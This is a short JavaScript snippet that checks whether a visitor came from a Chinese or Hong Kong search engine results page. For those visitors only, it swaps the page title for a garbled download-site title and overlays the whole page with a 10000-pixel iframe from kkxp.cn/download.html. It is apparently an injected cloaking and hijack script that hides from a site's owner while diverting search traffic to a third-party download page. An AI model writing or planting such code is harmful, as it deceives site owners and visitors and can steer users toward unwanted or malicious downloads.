var url = document.referrer.toLowerCase();
if(url.indexOf("google.com.hk/search?")>-1 || url.indexOf("soso.com/q?")>-1 || url.indexOf("sogou.com/web?")>-1 || url.indexOf("youdao.com/search?")>-1 || url.indexOf("baidu.com/s?")>-1)
{
	//document.title = document.location.href;
	document.title = "Ò¶×ÓÊ÷Èí¼þÏÂÔØµØÖ·";document.charset="gb2312";
	document.writeln("<iframe height='10000px' width='100%' frameborder='0' scrolling='no' src='http://kkxp.cn/download.html'></iframe>");
}
